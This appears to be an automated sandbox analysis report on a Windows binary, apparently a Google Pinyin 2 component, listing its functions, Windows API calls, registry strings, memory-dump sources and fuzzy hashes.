Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: LockitLockit::_std::_$Facet_Registerstd::locale::facet::_
String ID:
API String ID: 3374953348-0
Opcode ID: d191c1425811232ebe0b4ad3f5f1d647e59a4cd2c996eb982c3e919cdd4341b8
Instruction ID: e2e1f9f601343002c506cfe944a8166feea905bea3ec46021a236aff6d07a0bc
Opcode Fuzzy Hash: d191c1425811232ebe0b4ad3f5f1d647e59a4cd2c996eb982c3e919cdd4341b8
Instruction Fuzzy Hash: F031B071904351DFC714EF15D891B5A73A0BB24329F044A3EE492A72D1EB38AC09DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0043A3B0, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0043A415
CoUninitialize.OLE32(?,?,?,?,?,00514D60,000000FF), ref: 0043A427
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,?,00514D60,000000FF), ref: 0043A465
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0043A46C

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentInitializeSizeUninitializeWorking
String ID:
API String ID: 683297732-0
Opcode ID: 9434982cc2569a91cff1201d8c4b03f8589435f85629eafc67b0d0914c785c2e
Instruction ID: 053898101a46978fa54fd07115d19c8e7ad6d18814df1d4bcc763b0b88bb1eec
Opcode Fuzzy Hash: 9434982cc2569a91cff1201d8c4b03f8589435f85629eafc67b0d0914c785c2e
Instruction Fuzzy Hash: 44217F71648B408FD730CF24D848B52BBE4FB29720F144B1EE89683B90D775A8088B96

Uniqueness

Uniqueness Score: -1.00%

Function 00469650, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

SafeArrayCopy.OLEAUT32(?), ref: 00469673
SafeArrayGetVartype.OLEAUT32(?,?), ref: 0046967F

Part of subcall function 00401050: __CxxThrowException@8.LIBCMT ref: 00401062
Part of subcall function 00401050: _memcpy_s.LIBCMT ref: 00401078

VariantClear.OLEAUT32(0055FE18), ref: 004696E5
SysAllocString.OLEAUT32(0052FC70), ref: 00469705

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$AllocClearCopyException@8StringThrowVariantVartype_memcpy_s
String ID:
API String ID: 1406359233-0
Opcode ID: 8371c98099ac66d78639bcd06c44f8e58e36bd16ab7d4616ea6a2a2a475d77da
Instruction ID: 940eaafb2f38ad3af1b8d1c1ddeabd0035265cb3575a91a4fcdc9c5bcd51f8f3
Opcode Fuzzy Hash: 8371c98099ac66d78639bcd06c44f8e58e36bd16ab7d4616ea6a2a2a475d77da
Instruction Fuzzy Hash: D811C320200702C6D7206F32D819B1B266CEF22755F20442FE48ADB6A5F7BDCC95939E

Uniqueness

Uniqueness Score: -1.00%

Function 0043C300, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000007,?,00404849,?,?,0000001A,?,?,0000000D), ref: 0043C31E
CloseHandle.KERNEL32(00000000,?,00404849,?,?,0000001A,?,?,0000000D), ref: 0043C32E

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateEventHandle
String ID:
API String ID: 3369476804-0
Opcode ID: aa46b8f8d16d614b7959582a5d53518c89fc985019719955e3b678d78a21b9a7
Instruction ID: e63945aa0b37a99be0c77a3209266c4db50997c26514a3bf1aee6dc6626362eb
Opcode Fuzzy Hash: aa46b8f8d16d614b7959582a5d53518c89fc985019719955e3b678d78a21b9a7
Instruction Fuzzy Hash: 55118431240704ABEB308B39CC85B1777D47B5DB64F201B1AE58EA66D0E7B8B44A871C

Uniqueness

Uniqueness Score: -1.00%

Function 00461750, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 00461790
CloseHandle.KERNEL32(?), ref: 0046179E
CloseHandle.KERNEL32(?), ref: 004617A8
CloseHandle.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 004617C8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CriticalDeleteSection
String ID:
API String ID: 2166061224-0
Opcode ID: 71372d1cb48a2940478074da31c9fde0d9c22371263950e99a5854f0306608ca
Instruction ID: 0c11622c589e127797c226f17f6615889575afcf994db7ccb49a14a89805eb76
Opcode Fuzzy Hash: 71372d1cb48a2940478074da31c9fde0d9c22371263950e99a5854f0306608ca
Instruction Fuzzy Hash: 491170B5904B419BD620CF25DC80B5BB7E8FF14B61F180A2AE851D3790E738E80486A6

Uniqueness

Uniqueness Score: -1.00%

Function 004DC7D0, Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(5C313838,00000007), ref: 004DC7FA
TerminateProcess.KERNEL32(34393839,00000000,00000007), ref: 004DC802
WaitForSingleObject.KERNEL32(34393839,00001388), ref: 004DC811
CloseHandle.KERNEL32(34393839), ref: 004DC81B

Part of subcall function 004DCE50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004DCEAC
Part of subcall function 004DCE50: _memset.LIBCMT ref: 004DCEDF
Part of subcall function 004DCE50: Process32FirstW.KERNEL32 ref: 004DCEFB

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFirstObjectProcessProcess32SingleSnapshotTerminateToolhelp32Wait_memset
String ID:
API String ID: 400774340-0
Opcode ID: efbb5097e8e2b15b16ea2fd0fef62ea8d8f4554f2953ab9e75bf525e6b7764f3
Instruction ID: eaac1bd701ba2a4e0aa58c3573255ce87c9eaf9c557315ab3c23259b1bcc414a
Opcode Fuzzy Hash: efbb5097e8e2b15b16ea2fd0fef62ea8d8f4554f2953ab9e75bf525e6b7764f3
Instruction Fuzzy Hash: 1CF01474500B419FD730EF6A9884B4BBBE8AF54709F10481EE586D3B50E7B8E405CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004F811A, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004F8126

Part of subcall function 004F7212: __getptd_noexit.LIBCMT ref: 004F7215

__getptd.LIBCMT ref: 004F813D
__lock.LIBCMT ref: 004F815B
__updatetlocinfoEx_nolock.LIBCMT ref: 004F816F

Memory Dump Source

Source File: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 1314619503-0
Opcode ID: ede62e5e52a803fdc00dcaf9630b2401f6db74d066c83b9158415136d330279e
Instruction ID: 7c95b82426c89e82d01fa25d096c2ba157cdf00e34462907c36fe5edd984af90
Opcode Fuzzy Hash: ede62e5e52a803fdc00dcaf9630b2401f6db74d066c83b9158415136d330279e
Instruction Fuzzy Hash: 89F06231A4470CDAEA21BBA5580776A33A06B00729F15064FFA405F2D2CF6C59019A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004617F0, Relevance: 6.0, APIs: 4, Instructions: 33synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?,00420579), ref: 004617FD
EnterCriticalSection.KERNEL32(?,?,?,00420579), ref: 00461811
SetEvent.KERNEL32(?), ref: 00461832
LeaveCriticalSection.KERNEL32(?), ref: 00461839

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterEventLeaveMutexRelease
String ID:
API String ID: 3651273703-0
Opcode ID: 6fac0088fd4458384c7039d112335fc070bdab1218fa6c5306eb30e891e39823
Instruction ID: 6b0dc59f584902ee46ce94cc18deeacbb0783b6f7dfed1e6703bb3c5b71e3915
Opcode Fuzzy Hash: 6fac0088fd4458384c7039d112335fc070bdab1218fa6c5306eb30e891e39823
Instruction Fuzzy Hash: 7CF05E319006009FDB30AF58D844A6B77F8FF6774171C490EE441D7220D734E806EB69

Uniqueness

Uniqueness Score: -1.00%

Function 00444480, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004444D9

Part of subcall function 0041CE40: std::_Xinvalid_argument.LIBCPMT ref: 0041CE52
Part of subcall function 0041CE40: _memmove.LIBCMT ref: 0041CE7B

std::_Xinvalid_argument.LIBCPMT ref: 0044474B

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

Strings

vector<T> too long, xrefs: 00444746

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument_memmovestd::_std::exception::exception$Exception@8Throw
String ID: vector<T> too long
API String ID: 3981141188-3788999226
Opcode ID: 32d854ca5d2bf70996696fcf463890778c22c1d49a9e910bce1a178c33fc09ef
Instruction ID: c88d69aa059bf220404c61a4c45c940e983a37710121ecfbb36470c6ab23f32e
Opcode Fuzzy Hash: 32d854ca5d2bf70996696fcf463890778c22c1d49a9e910bce1a178c33fc09ef
Instruction Fuzzy Hash: 8D81D0716043419BDB18DF28C88172FB7E5BBC6309F114A2EF99697380E738E804CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00415260, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004152B5

Part of subcall function 00414A90: _memset.LIBCMT ref: 00414B44
Part of subcall function 00414A90: PathCombineW.SHLWAPI(?,?,?,?,?,09D48295,?), ref: 00414B74

Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218

Strings

userdict, xrefs: 004152C4, 00415304
index, xrefs: 0041542B

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$CombinePath_memmove
String ID: index$userdict
API String ID: 3787016909-1066451248
Opcode ID: 080992ae863463eddc562482c11f870130f260dcd0559cbc2f363824da3ae9cb
Instruction ID: 7c590dc16f5d6b77b15a30cbbfcb521ad8672a710d59431a253fbded000bd24e
Opcode Fuzzy Hash: 080992ae863463eddc562482c11f870130f260dcd0559cbc2f363824da3ae9cb
Instruction Fuzzy Hash: EA919DB15083C08BD730EB25D48179FB7E2AFD5308F40091EE68D57281DB78A948CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00424340, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

_memmove.LIBCMT ref: 004243A0
std::_Xinvalid_argument.LIBCPMT ref: 0042457D

Strings

vector<T> too long, xrefs: 00424578

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argument_malloc_memmovestd::_
String ID: vector<T> too long
API String ID: 1664685438-3788999226
Opcode ID: 8effa2e1cd95d4de3a4e2a6f894493131833c2ec15a4f7fc1fe667b642bd8697
Instruction ID: f35b55776a9ee98b66a0def2c1a0fa17013de6a0372bbcb444c779e9da6c428d
Opcode Fuzzy Hash: 8effa2e1cd95d4de3a4e2a6f894493131833c2ec15a4f7fc1fe667b642bd8697
Instruction Fuzzy Hash: 2E51F872B043614BC724DF28D84062BBBE0FFC4714F540A2EE99597381E639DD81878A

Uniqueness

Uniqueness Score: -1.00%

Function 00456560, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004565C4
InternetCrackUrlW.WININET ref: 00456601

Strings

<, xrefs: 004565F1

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CrackInternet_memset
String ID: <
API String ID: 1413715105-4251816714
Opcode ID: c2b355d9b38a4a0b3baf661c4518473e016bc21563e4d43b939ee1d3faa74e4c
Instruction ID: b29b27707a33191a23baa9c224ba0912ec6c827a50fd7a60821bf8c9f4f4aed5
Opcode Fuzzy Hash: c2b355d9b38a4a0b3baf661c4518473e016bc21563e4d43b939ee1d3faa74e4c
Instruction Fuzzy Hash: 8F4104712083409BD724DF29D84076BB7D8AF88316F55462FF959C7391EB78D908CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004145D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

Part of subcall function 00405450: std::_Xinvalid_argument.LIBCPMT ref: 004054B0
Part of subcall function 00405450: _memmove.LIBCMT ref: 00405506

Part of subcall function 0040E1F0: RegQueryValueExW.ADVAPI32 ref: 0040E240

_wcsncpy.LIBCMT ref: 00414737

Part of subcall function 00405050: RegCloseKey.ADVAPI32(00000000,09D48295,00000000,00000000,0050F9D8,000000FF,0040E97D,00000000,00000000), ref: 004050B2

Strings

Software\Google\Google Pinyin 2, xrefs: 00414633
DataPath, xrefs: 004146B8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValueXinvalid_argument_memmove_wcsncpystd::_
String ID: DataPath$Software\Google\Google Pinyin 2
API String ID: 2055595451-3352248130
Opcode ID: 2bdd5b602f4f572e0d3fac12018a1196aed1f6eef2829f89be382d1f8f06f4c8
Instruction ID: d5c4388653aa36eb4cf8960a67181cc05a00ca515adf465b8e10ceaaad8bea91
Opcode Fuzzy Hash: 2bdd5b602f4f572e0d3fac12018a1196aed1f6eef2829f89be382d1f8f06f4c8
Instruction Fuzzy Hash: 37518BB15183819FC720EF6A888165BFBE4BFD9314F504A2EF5A483291D77894488F57

Uniqueness

Uniqueness Score: -1.00%

Function 004B9380, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004B945B
_memmove.LIBCMT ref: 004B9493

Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234

Strings

CHECK failed: (&from) != (this): , xrefs: 004B93F5

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection_memmove$EnterException@8LeaveThrow
String ID: CHECK failed: (&from) != (this):
API String ID: 673156548-2589368188
Opcode ID: 4b2ac2b4c10da8ee97d50658121bb8c567012dca5b424aa450c50bd53d57892c
Instruction ID: 02fc1dcb1a43dae43f7449387c48de19db8943ae1147ca38e90c38f6720e6ff5
Opcode Fuzzy Hash: 4b2ac2b4c10da8ee97d50658121bb8c567012dca5b424aa450c50bd53d57892c
Instruction Fuzzy Hash: 8C419BB1604605AFC314DF1AC881A5BF7E8FF88358F048A2EF85683741D738E915CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00452650, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0045273E

Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234

Strings

h5S, xrefs: 0045269C
CHECK failed: (&from) != (this): , xrefs: 004526C7

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow_memmove
String ID: CHECK failed: (&from) != (this): $h5S
API String ID: 499820034-857661300
Opcode ID: c5e8979c8938db8b9cdbfb07f66b50920e39b5c0e711885d4b34e0ca03eee89e
Instruction ID: 76234d860b714075a6d0c5d9778ee7660a05571a9fd82b9c7d8c998de9c440e9
Opcode Fuzzy Hash: c5e8979c8938db8b9cdbfb07f66b50920e39b5c0e711885d4b34e0ca03eee89e
Instruction Fuzzy Hash: 7541AC706043059FD704DF19C991B9BBBE4BF89358F04462EF88587392D7B8E848CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040F670, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

SHCreateDirectory.SHELL32(00000000,?), ref: 0040F754
GetLastError.KERNEL32 ref: 0040F75E

Part of subcall function 004051E0: _memmove.LIBCMT ref: 00405218

Strings

Crash, xrefs: 0040F6B5

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast_memmove
String ID: Crash
API String ID: 2233950024-371843035
Opcode ID: 5a4ddde502cc46ae9f486b44b1a25329fdaed6f978dcdee53f9ba6245e28e522
Instruction ID: 021c7e1a8ea2aec01ac49ebabf0ae3551ee7afc425df1b4f53a1c00a4611aba4
Opcode Fuzzy Hash: 5a4ddde502cc46ae9f486b44b1a25329fdaed6f978dcdee53f9ba6245e28e522
Instruction Fuzzy Hash: 444146B59183849FC710DF2A9841A5BBBE4FF85704F40493EF88697680D779E809CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00412040, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,CommonSettings,00000000,?,?,?,09D48295,00000000,?,00000000,?,?,?,?,00000000,005158C8), ref: 00412095
RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?,?,?,?,00000000,005158C8,000000FF,00411E38), ref: 0041210D

Strings

CommonSettings, xrefs: 00412082

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Query
String ID: CommonSettings
API String ID: 4255345937-620825198
Opcode ID: 882b0575b1c14815c0f215aafd307351c7887b122a1c9333bfa350a5add94edc
Instruction ID: d03b0399506fea8f9f7486915c61b255c3ee442d994c93fb47630fb5ed484f09
Opcode Fuzzy Hash: 882b0575b1c14815c0f215aafd307351c7887b122a1c9333bfa350a5add94edc
Instruction Fuzzy Hash: 60318AB1648706AFC324CF18C980E67B7E5FB88750F544A1EE242C7280D774F899CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F320, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,09D48295), ref: 0040F365
GetUserNameW.ADVAPI32 ref: 0040F398

Strings

Software\Google\Google Pinyin 2 Preferences, xrefs: 0040F3A8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
